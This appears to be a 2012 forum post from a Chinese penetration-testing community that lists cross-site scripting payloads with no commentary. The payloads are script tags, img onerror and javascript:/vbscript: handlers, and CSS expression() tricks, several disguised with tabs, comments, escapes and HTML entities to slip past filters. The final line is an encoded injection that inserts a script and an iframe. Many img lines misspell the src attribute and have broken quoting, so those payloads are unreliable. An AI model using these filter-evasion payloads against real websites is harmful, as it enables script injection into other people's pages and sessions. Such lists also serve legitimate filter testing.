中国网络渗透测试联盟
Title: xss
Author: admin
Time: 2012-9-15 14:09
<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (each ? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["